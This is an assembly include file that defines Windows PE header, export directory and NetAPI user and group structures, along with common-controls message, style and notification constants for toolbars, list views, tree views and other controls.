.SizeOfOptionalHeader RESW 1
.Characteristics RESW 1
ENDSTRUC
STRUC IMAGE_NT_HEADERS
.Signature RESD 1
.FileHeader RESB IMAGE_FILE_HEADER_size ; embedded IMAGE_FILE_HEADER, not a pointer
.OptionalHeader RESB IMAGE_OPTIONAL_HEADER_size ; embedded IMAGE_OPTIONAL_HEADER, not a pointer
ENDSTRUC
STRUC IMAGE_EXPORT_DIRECTORY
.Characteristics RESD 1
.TimeDateStamp RESD 1
.MajorVersion RESW 1
.MinorVersion RESW 1
.nName RESD 1
.nBase RESD 1
.NumberOfFunctions RESD 1
.NumberOfNames RESD 1
.AddressOfFunctions RESD 1
.AddressOfNames RESD 1
.AddressOfNameOrdinals RESD 1 ; RVA of the WORD ordinal table; the field itself is a DWORD like the two RVAs above
ENDSTRUC
STRUC IMAGE_DOS_HEADER
.e_magic RESW 1
.e_cblp RESW 1
.e_cp RESW 1
.e_crlc RESW 1
.e_cparhdr RESW 1
.e_minalloc RESW 1
.e_maxalloc RESW 1
.e_ss RESW 1
.e_sp RESW 1
.e_csum RESW 1
.e_ip RESW 1
.e_cs RESW 1
.e_lfarlc RESW 1
.e_ovno RESW 1
.e_res4 RESW 4 ; e_res[4], reserved words
.e_oemid RESW 1
.e_oeminfo RESW 1
.e_res2 RESW 10 ; e_res2[10], reserved words
.e_lfanew RESD 1 ; file offset of the PE header, lands at 3Ch
ENDSTRUC
STRUC USER_INFO_3
.uName RESD 1
.Password RESD 1
.PasswordAge RESD 1
.Privilege RESD 1
.HomeDir RESD 1
.Comment RESD 1
.Flags RESD 1
.ScriptPath RESD 1
.AuthFlags RESD 1
.FullName RESD 1
.UserComment RESD 1
.Parms RESD 1
.Workstations RESD 1
.LastLogon RESD 1
.LastLogoff RESD 1
.AcctExpires RESD 1
.MaxStorage RESD 1
.UnitsPerWeek RESD 1
.LogonHours RESD 1
.BadPwCount RESD 1
.NumLogons RESD 1
.LogonServer RESD 1
.CountryCode RESD 1
.CodePage RESD 1
.UserID RESD 1
.PrimaryGroupID RESD 1
.Profile RESD 1
.HomeDirDrive RESD 1
.PasswordExpired RESD 1
ENDSTRUC
STRUC GROUP_INFO_2
.uName RESD 1
.Comment RESD 1
.GroupID RESD 1
.Attributes RESD 1
ENDSTRUC
;---------------------------comctl equates-------------------------------
ODT_HEADER equ 100
ODT_TAB equ 101
ODT_LISTVIEW equ 102
LVM_FIRST equ 1000h
TV_FIRST equ 1100h
HDM_FIRST equ 1200h
NM_OUTOFMEMORY equ NM_FIRST-1
NM_CLICK equ NM_FIRST-2
NM_DBLCLK equ NM_FIRST-3
NM_RETURN equ NM_FIRST-4
NM_RCLICK equ NM_FIRST-5
NM_RDBLCLK equ NM_FIRST-6
NM_SETFOCUS equ NM_FIRST-7
NM_KILLFOCUS equ NM_FIRST-8
CCS_TOP equ 00000001h
CCS_NOMOVEY equ 00000002h
CCS_BOTTOM equ 00000003h
CCS_NORESIZE equ 00000004h
CCS_NOPARENTALIGN equ 00000008h
CCS_ADJUSTABLE equ 00000020h
CCS_NODIVIDER equ 00000040h
CCM_FIRST equ 2000h
CCM_SETBKCOLOR equ CCM_FIRST+1
CCM_SETCOLORSCHEME equ CCM_FIRST+2
CCM_GETCOLORSCHEME equ CCM_FIRST+3
CCM_GETDROPTARGET equ CCM_FIRST+4
CCM_SETUNICODEFORMAT equ CCM_FIRST+5
CCM_GETUNICODEFORMAT equ CCM_FIRST+6
LVN_FIRST equ 0-100
LVN_LAST equ 0-199
HDN_FIRST equ 0-300
HDN_LAST equ 0-399
TVN_FIRST equ 0-400
TVN_LAST equ 0-499
TTN_FIRST equ 0-520
TTN_LAST equ 0-549
TCN_FIRST equ 0-550
TCN_LAST equ 0-580
CDN_FIRST equ 0-601
CDN_LAST equ 0-699
TBN_FIRST equ 0-700
TBN_LAST equ 0-720
UDN_FIRST equ 0-721
UDN_LAST equ 0-740
MCN_FIRST equ 0-750
MCN_LAST equ 0-759
DTN_FIRST equ 0-760
DTN_LAST equ 0-799
CBEN_FIRST equ 0-800
CBEN_LAST equ 0-830
RBN_FIRST equ 0-831
RBN_LAST equ 0-859
IPN_FIRST equ 0-860
IPN_LAST equ 0-879
SBN_FIRST equ 0-880
SBN_LAST equ 0-899
PGN_FIRST equ 0-900
PGN_LAST equ 0-950
MSGF_COMMCTRL_BEGINDRAG equ 4200h
MSGF_COMMCTRL_SIZEHEADER equ 4201h
MSGF_COMMCTRL_DRAGSELECT equ 4202h
MSGF_COMMCTRL_TOOLBARCUST equ 4203h
ICC_LISTVIEW_CLASSES equ 00000001h
ICC_TREEVIEW_CLASSES equ 00000002h
ICC_BAR_CLASSES equ 00000004h
ICC_TAB_CLASSES equ 00000008h
ICC_UPDOWN_CLASS equ 00000010h
ICC_PROGRESS_CLASS equ 00000020h
ICC_HOTKEY_CLASS equ 00000040h
ICC_ANIMATE_CLASS equ 00000080h
ICC_WIN95_CLASSES equ 000000FFh
ICC_DATE_CLASSES equ 00000100h
ICC_USEREX_CLASSES equ 00000200h
ICC_COOL_CLASSES equ 00000400h
ICC_INTERNET_CLASSES equ 00000800h
ICC_PAGESCROLLER_CLASS equ 00001000h
ICC_NATIVEFNTCTL_CLASS equ 00002000h
RBIM_IMAGELIST equ 00000001h
RBS_TOOLTIPS equ 0100h
RBS_VARHEIGHT equ 0200h
RBS_BANDBORDERS equ 0400h
RBS_FIXEDORDER equ 0800h
RBS_REGISTERDROP equ 1000h
RBS_AUTOSIZE equ 2000h
RBS_VERTICALGRIPPER equ 4000h
RBS_DBLCLKTOGGLE equ 8000h
RBBS_BREAK equ 00000001h
RBBS_FIXEDSIZE equ 00000002h
RBBS_CHILDEDGE equ 00000004h
RBBS_HIDDEN equ 00000008h
RBBS_NOVERT equ 00000010h
RBBS_FIXEDBMP equ 00000020h
RBBS_VARIABLEHEIGHT equ 00000040h
RBBS_GRIPPERALWAYS equ 00000080h
RBBS_NOGRIPPER equ 00000100h
RBBIM_STYLE equ 00000001h
RBBIM_COLORS equ 00000002h
RBBIM_TEXT equ 00000004h
RBBIM_IMAGE equ 00000008h
RBBIM_CHILD equ 00000010h
RBBIM_CHILDSIZE equ 00000020h
RBBIM_SIZE equ 00000040h
RBBIM_BACKGROUND equ 00000080h
RBBIM_ID equ 00000100h
RBBIM_IDEALSIZE equ 00000200h
RBBIM_LPARAM equ 00000400h
RBBIM_HEADERSIZE equ 00000800h
RB_INSERTBAND equ WM_USER+1
RB_DELETEBAND equ WM_USER+2
RB_GETBARINFO equ WM_USER+3
RB_SETBARINFO equ WM_USER+4
RB_GETBANDINFO equ WM_USER+5
RB_SETBANDINFO equ WM_USER+6
RB_SETPARENT equ WM_USER+7
RB_HITTEST equ WM_USER+8
RB_GETRECT equ WM_USER+9
RB_GETBANDCOUNT equ WM_USER+12
RB_GETROWCOUNT equ WM_USER+13
RB_GETROWHEIGHT equ WM_USER+14
RB_IDTOINDEX equ WM_USER+16
RB_GETTOOLTIPS equ WM_USER+17
RB_SETTOOLTIPS equ WM_USER+18
RB_SETBKCOLOR equ WM_USER+19
RB_GETBKCOLOR equ WM_USER+20
RB_SETTEXTCOLOR equ WM_USER+21
RB_GETTEXTCOLOR equ WM_USER+22
RB_SIZETORECT equ WM_USER+23
RB_SETCOLORSCHEME equ CCM_SETCOLORSCHEME
RB_GETCOLORSCHEME equ CCM_GETCOLORSCHEME
RB_BEGINDRAG equ WM_USER+24
RB_ENDDRAG equ WM_USER+25
RB_DRAGMOVE equ WM_USER+26
RB_GETBARHEIGHT equ WM_USER+27
RB_MINIMIZEBAND equ WM_USER+30
RB_MAXIMIZEBAND equ WM_USER+31
RB_GETDROPTARGET equ CCM_GETDROPTARGET
RB_GETBANDBORDERS equ WM_USER+34
RB_SHOWBAND equ WM_USER+35
RB_SETPALETTE equ WM_USER+37
RB_GETPALETTE equ WM_USER+38
RB_MOVEBAND equ WM_USER+39
RB_SETUNICODEFORMAT equ CCM_SETUNICODEFORMAT
RB_GETUNICODEFORMAT equ CCM_GETUNICODEFORMAT
RBN_HEIGHTCHANGE equ RBN_FIRST-0
RBN_GETOBJECT equ RBN_FIRST-1
RBN_LAYOUTCHANGED equ RBN_FIRST-2
RBN_AUTOSIZE equ RBN_FIRST-3
RBN_BEGINDRAG equ RBN_FIRST-4
RBN_ENDDRAG equ RBN_FIRST-5
RBN_DELETINGBAND equ RBN_FIRST-6
RBN_DELETEDBAND equ RBN_FIRST-7
RBN_CHILDSIZE equ RBN_FIRST-8
RBNM_ID equ 00000001h
RBNM_STYLE equ 00000002h
RBNM_LPARAM equ 00000004h
RBHT_NOWHERE equ 0001h
RBHT_CAPTION equ 0002h
RBHT_CLIENT equ 0003h
RBHT_GRABBER equ 0004h
CLR_NONE equ 0FFFFFFFFh
CLR_DEFAULT equ 0FF000000h
ILC_MASK equ 0001h
ILC_COLOR equ 0000h
ILC_COLORDDB equ 00FEh
ILC_COLOR4 equ 0004h
ILC_COLOR8 equ 0008h
ILC_COLOR16 equ 0010h
ILC_COLOR24 equ 0018h
ILC_COLOR32 equ 0020h
ILC_PALETTE equ 0800h
ILD_NORMAL equ 0000h
ILD_TRANSPARENT equ 0001h
ILD_MASK equ 0010h
ILD_IMAGE equ 0020h
ILD_BLEND25 equ 0002h
ILD_BLEND50 equ 0004h
ILD_OVERLAYMASK equ 0F00h
ILD_SELECTED equ ILD_BLEND50
ILD_FOCUS equ ILD_BLEND25
ILD_BLEND equ ILD_BLEND50
CLR_HILIGHT equ CLR_DEFAULT
HDS_HORZ equ 00000000h
HDS_BUTTONS equ 00000002h
HDS_HIDDEN equ 00000008h
HDI_WIDTH equ 0001h
HDI_HEIGHT equ HDI_WIDTH
HDI_TEXT equ 0002h
HDI_FORMAT equ 0004h
HDI_LPARAM equ 0008h
HDI_BITMAP equ 0010h
HDF_LEFT equ 0
HDF_RIGHT equ 1
HDF_CENTER equ 2
HDF_JUSTIFYMASK equ 0003h
HDF_RTLREADING equ 4
HDF_OWNERDRAW equ 8000h
HDF_STRING equ 4000h
HDF_BITMAP equ 2000h
HDM_GETITEMCOUNT equ HDM_FIRST+0
HDM_INSERTITEM equ HDM_FIRST+1
HDM_INSERTITEMW equ HDM_FIRST+10
HDM_DELETEITEM equ HDM_FIRST+2
HDM_GETITEM equ HDM_FIRST+3
HDM_GETITEMW equ HDM_FIRST+11
HDM_SETITEM equ HDM_FIRST+4
HDM_SETITEMW equ HDM_FIRST+12
HDM_LAYOUT equ HDM_FIRST+5
HHT_NOWHERE equ 0001h
HHT_ONHEADER equ 0002h
HHT_ONDIVIDER equ 0004h
HHT_ONDIVOPEN equ 0008h
HHT_ABOVE equ 0100h
HHT_BELOW equ 0200h
HHT_TORIGHT equ 0400h
HHT_TOLEFT equ 0800h
HDM_HITTEST equ HDM_FIRST+6
HDN_ITEMCHANGING equ HDN_FIRST-0
HDN_ITEMCHANGINGW equ HDN_FIRST-20
HDN_ITEMCHANGED equ HDN_FIRST-1
HDN_ITEMCHANGEDW equ HDN_FIRST-21
HDN_ITEMCLICK equ HDN_FIRST-2
HDN_ITEMCLICKW equ HDN_FIRST-22
HDN_ITEMDBLCLICK equ HDN_FIRST-3
HDN_ITEMDBLCLICKW equ HDN_FIRST-23
HDN_DIVIDERDBLCLICK equ HDN_FIRST-5
HDN_DIVIDERDBLCLICKW equ HDN_FIRST-25
HDN_BEGINTRACK equ HDN_FIRST-6
HDN_BEGINTRACKW equ HDN_FIRST-26
HDN_ENDTRACK equ HDN_FIRST-7
HDN_ENDTRACKW equ HDN_FIRST-27
HDN_TRACK equ HDN_FIRST-8
HDN_TRACKW equ HDN_FIRST-28
CMB_MASKED equ 02h
TBSTATE_CHECKED equ 01h
TBSTATE_PRESSED equ 02h
TBSTATE_ENABLED equ 04h
TBSTATE_HIDDEN equ 08h
TBSTATE_INDETERMINATE equ 10h
TBSTATE_WRAP equ 20h
TBSTYLE_BUTTON equ 00h
TBSTYLE_SEP equ 01h
TBSTYLE_CHECK equ 02h
TBSTYLE_GROUP equ 04h
TBSTYLE_CHECKGROUP equ TBSTYLE_GROUP|TBSTYLE_CHECK
TBSTYLE_TOOLTIPS equ 0100h
TBSTYLE_WRAPABLE equ 0200h
TBSTYLE_ALTDRAG equ 0400h
TBSTYLE_FLAT equ 0800h
TBSTYLE_LIST equ 1000h
TBSTYLE_CUSTOMERASE equ 2000h
TBSTYLE_REGISTERDROP equ 4000h
TBSTYLE_TRANSPARENT equ 8000h
TB_ENABLEBUTTON equ WM_USER+1
TB_CHECKBUTTON equ WM_USER+2
TB_PRESSBUTTON equ WM_USER+3
TB_HIDEBUTTON equ WM_USER+4
TB_INDETERMINATE equ WM_USER+5
TB_ISBUTTONENABLED equ WM_USER+9
TB_ISBUTTONCHECKED equ WM_USER+10
TB_ISBUTTONPRESSED equ WM_USER+11
TB_ISBUTTONHIDDEN equ WM_USER+12
TB_ISBUTTONINDETERMINATE equ WM_USER+13
TB_SETSTATE equ WM_USER+17
TB_GETSTATE equ WM_USER+18
TB_ADDBITMAP equ WM_USER+19
TB_SETSTYLE equ WM_USER+56
TB_GETSTYLE equ WM_USER+57
HINST_COMMCTRL equ -1
IDB_STD_SMALL_COLOR equ 0
IDB_STD_LARGE_COLOR equ 1
IDB_VIEW_SMALL_COLOR equ 4
IDB_VIEW_LARGE_COLOR equ 5
STD_CUT equ 0
STD_COPY equ 1
STD_PASTE equ 2
STD_UNDO equ 3
STD_REDOW equ 4
STD_DELETE equ 5
STD_FILENEW equ 6
STD_FILEOPEN equ 7
STD_FILESAVE equ 8
STD_PRINTPRE equ 9
STD_PROPERTIES equ 10
STD_HELP equ 11
STD_FIND equ 12
STD_REPLACE equ 13
STD_PRINT equ 14
VIEW_LARGEICONS equ 0
VIEW_SMALLICONS equ 1
VIEW_LIST equ 2
VIEW_DETAILS equ 3
VIEW_SORTNAME equ 4
VIEW_SORTSIZE equ 5
VIEW_SORTDATE equ 6
VIEW_SORTTYPE equ 7
VIEW_PARENTFOLDER equ 8
VIEW_NETCONNECT equ 9
VIEW_NETDISCONNECT equ 10
VIEW_NEWFOLDER equ 11
TB_ADDBUTTONS equ WM_USER+20
TB_INSERTBUTTON equ WM_USER+21
TB_DELETEBUTTON equ WM_USER+22
TB_GETBUTTON equ WM_USER+23
TB_BUTTONCOUNT equ WM_USER+24
TB_COMMANDTOINDEX equ WM_USER+25
TB_SAVERESTORE equ WM_USER+26
TB_SAVERESTOREW equ WM_USER+76
TB_CUSTOMIZE equ WM_USER+27
TB_ADDSTRING equ WM_USER+28
TB_ADDSTRINGW equ WM_USER+77
TB_GETITEMRECT equ WM_USER+29
TB_BUTTONSTRUCTSIZE equ WM_USER+30
TB_SETBUTTONSIZE equ WM_USER+31
TB_SETBITMAPSIZE equ WM_USER+32
TB_AUTOSIZE equ WM_USER+33
TB_GETTOOLTIPS equ WM_USER+35
TB_SETTOOLTIPS equ WM_USER+36
TB_SETPARENT equ WM_USER+37
TB_SETROWS equ WM_USER+39
TB_GETROWS equ WM_USER+40
TB_SETCMDID equ WM_USER+42
TB_CHANGEBITMAP equ WM_USER+43
TB_GETBITMAP equ WM_USER+44
TB_GETBUTTONTEXT equ WM_USER+45
TB_GETBUTTONTEXTW equ WM_USER+75
TB_REPLACEBITMAP equ WM_USER+46
TBBF_LARGE equ 0001h
TB_GETBITMAPFLAGS equ WM_USER+41
TBN_GETBUTTONINFO equ TBN_FIRST-0
TBN_GETBUTTONINFOW equ TBN_FIRST-20
TBN_BEGINDRAG equ TBN_FIRST-1
TBN_ENDDRAG equ TBN_FIRST-2
TBN_BEGINADJUST equ TBN_FIRST-3
TBN_ENDADJUST equ TBN_FIRST-4
TBN_RESET equ TBN_FIRST-5
TBN_QUERYINSERT equ TBN_FIRST-6
TBN_QUERYDELETE equ TBN_FIRST-7
TBN_TOOLBARCHANGE equ TBN_FIRST-8
TBN_CUSTHELP equ TBN_FIRST-9
TTS_ALWAYSTIP equ 01h
TTS_NOPREFIX equ 02h
TTF_IDISHWND equ 01h
TTF_CENTERTIP equ 02h
TTF_RTLREADING equ 04h
TTF_SUBCLASS equ 10h
TTDT_AUTOMATIC equ 0
TTDT_RESHOW equ 1
TTDT_AUTOPOP equ 2
TTDT_INITIAL equ 3
TTM_ACTIVATE equ WM_USER+1
TTM_SETDELAYTIME equ WM_USER+3
TTM_ADDTOOL equ WM_USER+4
TTM_ADDTOOLW equ WM_USER+50
TTM_DELTOOL equ WM_USER+5
TTM_DELTOOLW equ WM_USER+51
TTM_NEWTOOLRECT equ WM_USER+6
TTM_NEWTOOLRECTW equ WM_USER+52
TTM_RELAYEVENT equ WM_USER+7
TTM_GETTOOLINFO equ WM_USER+8
TTM_GETTOOLINFOW equ WM_USER+53
TTM_SETTOOLINFO equ WM_USER+9
TTM_SETTOOLINFOW equ WM_USER+54
TTM_HITTEST equ WM_USER+10
TTM_HITTESTW equ WM_USER+55
TTM_GETTEXT equ WM_USER+11
TTM_GETTEXTW equ WM_USER+56
TTM_UPDATETIPTEXT equ WM_USER+12
TTM_UPDATETIPTEXTW equ WM_USER+57
TTM_GETTOOLCOUNT equ WM_USER+13
TTM_ENUMTOOLS equ WM_USER+14
TTM_ENUMTOOLSW equ WM_USER+58
TTM_GETCURRENTTOOL equ WM_USER+15
TTM_GETCURRENTTOOLW equ WM_USER+59
TTM_WINDOWFROMPOINT equ WM_USER+16
TTN_NEEDTEXT equ TTN_FIRST-0
TTN_NEEDTEXTW equ TTN_FIRST-10
TTN_SHOW equ TTN_FIRST-1
TTN_POP equ TTN_FIRST-2
SBARS_SIZEGRIP equ 0100h
SB_SETTEXT equ WM_USER+1
SB_SETTEXTW equ WM_USER+11
SB_GETTEXT equ WM_USER+2
SB_GETTEXTW equ WM_USER+13
SB_GETTEXTLENGTH equ WM_USER+3
SB_GETTEXTLENGTHW equ WM_USER+12
SB_SETPARTS equ WM_USER+4
SB_GETPARTS equ WM_USER+6
SB_GETBORDERS equ WM_USER+7
SB_SETMINHEIGHT equ WM_USER+8
SB_SIMPLE equ WM_USER+9
SB_GETRECT equ WM_USER+10
SBT_OWNERDRAW equ 1000h
SBT_NOBORDERS equ 0100h
SBT_POPOUT equ 0200h
SBT_RTLREADING equ 0400h
MINSYSCOMMAND equ SC_SIZE
TBS_AUTOTICKS equ 0001h
TBS_VERT equ 0002h
TBS_HORZ equ 0000h
TBS_TOP equ 0004h
TBS_BOTTOM equ 0000h
TBS_LEFT equ 0004h
TBS_RIGHT equ 0000h
TBS_BOTH equ 0008h
TBS_NOTICKS equ 0010h
TBS_ENABLESELRANGE equ 0020h
TBS_FIXEDLENGTH equ 0040h
TBS_NOTHUMB equ 0080h
TBM_GETPOS equ WM_USER
TBM_GETRANGEMIN equ WM_USER+1
TBM_GETRANGEMAX equ WM_USER+2
TBM_GETTIC equ WM_USER+3
TBM_SETTIC equ WM_USER+4
TBM_SETPOS equ WM_USER+5
TBM_SETRANGE equ WM_USER+6
TBM_SETRANGEMIN equ WM_USER+7
TBM_SETRANGEMAX equ WM_USER+8
TBM_CLEARTICS equ WM_USER+9
TBM_SETSEL equ WM_USER+10
TBM_SETSELSTART equ WM_USER+11
TBM_SETSELEND equ WM_USER+12
TBM_GETPTICS equ WM_USER+14
TBM_GETTICPOS equ WM_USER+15
TBM_GETNUMTICS equ WM_USER+16
TBM_GETSELSTART equ WM_USER+17
TBM_GETSELEND equ WM_USER+18
TBM_CLEARSEL equ WM_USER+19
TBM_SETTICFREQ equ WM_USER+20
TBM_SETPAGESIZE equ WM_USER+21
TBM_GETPAGESIZE equ WM_USER+22
TBM_SETLINESIZE equ WM_USER+23
TBM_GETLINESIZE equ WM_USER+24
TBM_GETTHUMBRECT equ WM_USER+25
TBM_GETCHANNELRECT equ WM_USER+26
TBM_SETTHUMBLENGTH equ WM_USER+27
TBM_GETTHUMBLENGTH equ WM_USER+28
TB_LINEUP equ 0
TB_LINEDOWN equ 1
TB_PAGEUP equ 2
TB_PAGEDOWN equ 3
TB_THUMBPOSITION equ 4
TB_THUMBTRACK equ 5
TB_TOP equ 6
TB_BOTTOM equ 7
TB_ENDTRACK equ 8
DL_BEGINDRAG equ WM_USER+133
DL_DRAGGING equ WM_USER+134
DL_DROPPED equ WM_USER+135
DL_CANCELDRAG equ WM_USER+136
DL_CURSORSET equ 0
DL_STOPCURSOR equ 1
DL_COPYCURSOR equ 2
DL_MOVECURSOR equ 3
UD_MAXVAL equ 7FFFh
UD_MINVAL equ -UD_MAXVAL
UDS_WRAP equ 0001h
UDS_SETBUDDYINT equ 0002h
UDS_ALIGNRIGHT equ 0004h
UDS_ALIGNLEFT equ 0008h
UDS_AUTOBUDDY equ 0010h
UDS_ARROWKEYS equ 0020h
UDS_HORZ equ 0040h
UDS_NOTHOUSANDS equ 0080h
UDM_SETRANGE equ WM_USER+101
UDM_GETRANGE equ WM_USER+102
UDM_SETPOS equ WM_USER+103
UDM_GETPOS equ WM_USER+104
UDM_SETBUDDY equ WM_USER+105
UDM_GETBUDDY equ WM_USER+106
UDM_SETACCEL equ WM_USER+107
UDM_GETACCEL equ WM_USER+108
UDM_SETBASE equ WM_USER+109
UDM_GETBASE equ WM_USER+110
UDN_DELTAPOS equ UDN_FIRST-1
PBM_SETRANGE equ WM_USER+1
PBM_SETPOS equ WM_USER+2
PBM_DELTAPOS equ WM_USER+3
PBM_SETSTEP equ WM_USER+4
PBM_STEPIT equ WM_USER+5
HOTKEYF_SHIFT equ 01h
HOTKEYF_CONTROL equ 02h
HOTKEYF_ALT equ 04h
HOTKEYF_EXT equ 08h
HKCOMB_NONE equ 0001h
HKCOMB_S equ 0002h
HKCOMB_C equ 0004h
HKCOMB_A equ 0008h
HKCOMB_SC equ 0010h
HKCOMB_SA equ 0020h
HKCOMB_CA equ 0040h
HKCOMB_SCA equ 0080h
HKM_SETHOTKEY equ WM_USER+1
HKM_GETHOTKEY equ WM_USER+2
HKM_SETRULES equ WM_USER+3
LVS_ICON equ 0000h
LVS_REPORT equ 0001h
LVS_SMALLICON equ 0002h
LVS_LIST equ 0003h
LVS_TYPEMASK equ 0003h
LVS_SINGLESEL equ 0004h
LVS_SHOWSELALWAYS equ 0008h
LVS_SORTASCENDING equ 0010h
LVS_SORTDESCENDING equ 0020h
LVS_SHAREIMAGELISTS equ 0040h
LVS_NOLABELWRAP equ 0080h
LVS_AUTOARRANGE equ 0100h
LVS_EDITLABELS equ 0200h
LVS_NOSCROLL equ 2000h
LVS_TYPESTYLEMASK equ 0fc00h
LVS_ALIGNTOP equ 0000h
LVS_ALIGNLEFT equ 0800h
LVS_ALIGNMASK equ 0c00h
LVS_OWNERDRAWFIXED equ 0400h
LVS_NOCOLUMNHEADER equ 4000h
LVS_NOSORTHEADER equ 8000h
LVM_GETBKCOLOR equ LVM_FIRST+0
LVM_SETBKCOLOR equ LVM_FIRST+1
LVM_GETIMAGELIST equ LVM_FIRST+2
LVSIL_NORMAL equ 0
LVSIL_SMALL equ 1
LVSIL_STATE equ 2
LVM_SETIMAGELIST equ LVM_FIRST+3
LVM_GETITEMCOUNT equ LVM_FIRST+4
LVIF_TEXT equ 0001h
LVIF_IMAGE equ 0002h
LVIF_PARAM equ 0004h
LVIF_STATE equ 0008h
LVIS_FOCUSED equ 0001h
LVIS_SELECTED equ 0002h
LVIS_CUT equ 0004h
LVIS_DROPHILITED equ 0008h
LVIS_OVERLAYMASK equ 0F00h
LVIS_STATEIMAGEMASK equ 0F000h
LPSTR_TEXTCALLBACKW equ -1
LPSTR_TEXTCALLBACK equ -1
I_IMAGECALLBACK equ -1
LVM_GETITEM equ LVM_FIRST+5
LVM_GETITEMW equ LVM_FIRST+75
LVM_SETITEM equ LVM_FIRST+6
LVM_SETITEMW equ LVM_FIRST+76
LVM_INSERTITEM equ LVM_FIRST+7
LVM_INSERTITEMW equ LVM_FIRST+77
LVM_DELETEITEM equ LVM_FIRST+8
LVM_DELETEALLITEMS equ LVM_FIRST+9
LVM_GETCALLBACKMASK equ LVM_FIRST+10
LVM_SETCALLBACKMASK equ LVM_FIRST+11
LVNI_ALL equ 0000h
LVNI_FOCUSED equ 0001h
LVNI_SELECTED equ 0002h
LVNI_CUT equ 0004h
LVNI_DROPHILITED equ 0008h
LVNI_ABOVE equ 0100h
LVNI_BELOW equ 0200h
LVNI_TOLEFT equ 0400h
LVNI_TORIGHT equ 0800h
LVM_GETNEXTITEM equ LVM_FIRST+12
LVFI_PARAM equ 0001h
LVFI_STRING equ 0002h
LVFI_PARTIAL equ 0008h
LVFI_WRAP equ 0020h
LVFI_NEARESTXY equ 0040h
LVM_FINDITEM equ LVM_FIRST+13
LVM_FINDITEMW equ LVM_FIRST+83
LVIR_BOUNDS equ 0
LVIR_ICON equ 1
LVIR_LABEL equ 2
LVIR_SELECTBOUNDS equ 3
LVM_GETITEMRECT equ LVM_FIRST+14
LVM_SETITEMPOSITION equ LVM_FIRST+15
LVM_GETITEMPOSITION equ LVM_FIRST+16
LVM_GETSTRINGWIDTH equ LVM_FIRST+17
LVM_GETSTRINGWIDTHW equ LVM_FIRST+87
LVHT_NOWHERE equ 0001h
LVHT_ONITEMICON equ 0002h
LVHT_ONITEMLABEL equ 0004h
LVHT_ONITEMSTATEICON equ 0008h
LVHT_ONITEM equ LVHT_ONITEMICON|LVHT_ONITEMLABEL|LVHT_ONITEMSTATEICON
LVHT_ABOVE equ 0008h
LVHT_BELOW equ 0010h
LVHT_TORIGHT equ 0020h
LVHT_TOLEFT equ 0040h
LVM_HITTEST equ LVM_FIRST+18
LVM_ENSUREVISIBLE equ LVM_FIRST+19
LVM_SCROLL equ LVM_FIRST+20
LVM_REDRAWITEMS equ LVM_FIRST+21
LVA_DEFAULT equ 0000h
LVA_ALIGNLEFT equ 0001h
LVA_ALIGNTOP equ 0002h
LVA_SNAPTOGRID equ 0005h
LVM_ARRANGE equ LVM_FIRST+22
LVM_EDITLABEL equ LVM_FIRST+23
LVM_EDITLABELW equ LVM_FIRST+118
LVM_GETEDITCONTROL equ LVM_FIRST+24
LVCF_FMT equ 0001h
LVCF_WIDTH equ 0002h
LVCF_TEXT equ 0004h
LVCF_SUBITEM equ 0008h
LVCFMT_LEFT equ 0000h
LVCFMT_RIGHT equ 0001h
LVCFMT_CENTER equ 0002h
LVCFMT_JUSTIFYMASK equ 0003h
LVM_GETCOLUMN equ LVM_FIRST+25
LVM_GETCOLUMNW equ LVM_FIRST+95
LVM_SETCOLUMN equ LVM_FIRST+26
LVM_SETCOLUMNW equ LVM_FIRST+96
LVM_INSERTCOLUMN equ LVM_FIRST+27
LVM_INSERTCOLUMNW equ LVM_FIRST+97
LVM_DELETECOLUMN equ LVM_FIRST+28
LVM_GETCOLUMNWIDTH equ LVM_FIRST+29
LVSCW_AUTOSIZE equ -1
LVSCW_AUTOSIZE_USEHEADER equ -2
LVM_SETCOLUMNWIDTH equ LVM_FIRST+30
LVM_CREATEDRAGIMAGE equ LVM_FIRST+33
LVM_GETVIEWRECT equ LVM_FIRST+34
LVM_GETTEXTCOLOR equ LVM_FIRST+35
LVM_SETTEXTCOLOR equ LVM_FIRST+36
LVM_GETTEXTBKCOLOR equ LVM_FIRST+37
LVM_SETTEXTBKCOLOR equ LVM_FIRST+38
LVM_GETTOPINDEX equ LVM_FIRST+39
LVM_GETCOUNTPERPAGE equ LVM_FIRST+40
LVM_GETORIGIN equ LVM_FIRST+41
LVM_UPDATE equ LVM_FIRST+42
LVM_SETITEMSTATE equ LVM_FIRST+43
LVM_GETITEMSTATE equ LVM_FIRST+44
LVM_GETITEMTEXT equ LVM_FIRST+45
LVM_GETITEMTEXTW equ LVM_FIRST+115
LVM_SETITEMTEXT equ LVM_FIRST+46
LVM_SETITEMTEXTW equ LVM_FIRST+116
LVM_SETITEMCOUNT equ LVM_FIRST+47
LVM_SORTITEMS equ LVM_FIRST+48
LVM_SETITEMPOSITION32 equ LVM_FIRST+49
LVM_GETSELECTEDCOUNT equ LVM_FIRST+50
LVM_GETITEMSPACING equ LVM_FIRST+51
LVM_GETISEARCHSTRING equ LVM_FIRST+52
LVM_GETISEARCHSTRINGW equ LVM_FIRST+117
LVN_ITEMCHANGING equ LVN_FIRST-0
LVN_ITEMCHANGED equ LVN_FIRST-1
LVN_INSERTITEM equ LVN_FIRST-2
LVN_DELETEITEM equ LVN_FIRST-3
LVN_DELETEALLITEMS equ LVN_FIRST-4
LVN_BEGINLABELEDIT equ LVN_FIRST-5
LVN_BEGINLABELEDITW equ LVN_FIRST-75
LVN_ENDLABELEDIT equ LVN_FIRST-6
LVN_ENDLABELEDITW equ LVN_FIRST-76
LVN_COLUMNCLICK equ LVN_FIRST-8
LVN_BEGINDRAG equ LVN_FIRST-9
LVN_BEGINRDRAG equ LVN_FIRST-11
LVN_GETDISPINFO equ LVN_FIRST-50
LVN_GETDISPINFOW equ LVN_FIRST-77
LVN_SETDISPINFO equ LVN_FIRST-51
LVN_SETDISPINFOW equ LVN_FIRST-78
LVIF_DI_SETITEM equ 1000h
LVN_KEYDOWN equ LVN_FIRST-55
TVS_HASBUTTONS equ 0001h
TVS_HASLINES equ 0002h
TVS_LINESATROOT equ 0004h
TVS_EDITLABELS equ 0008h
TVS_DISABLEDRAGDROP equ 0010h
TVS_SHOWSELALWAYS equ 0020h
TVIF_TEXT equ 0001h
TVIF_IMAGE equ 0002h
TVIF_PARAM equ 0004h
TVIF_STATE equ 0008h
TVIF_HANDLE equ 0010h
TVIF_SELECTEDIMAGE equ 0020h
TVIF_CHILDREN equ 0040h
TVIS_FOCUSED equ 0001h
TVIS_SELECTED equ 0002h
TVIS_CUT equ 0004h
TVIS_DROPHILITED equ 0008h
TVIS_BOLD equ 0010h
TVIS_EXPANDED equ 0020h
TVIS_EXPANDEDONCE equ 0040h
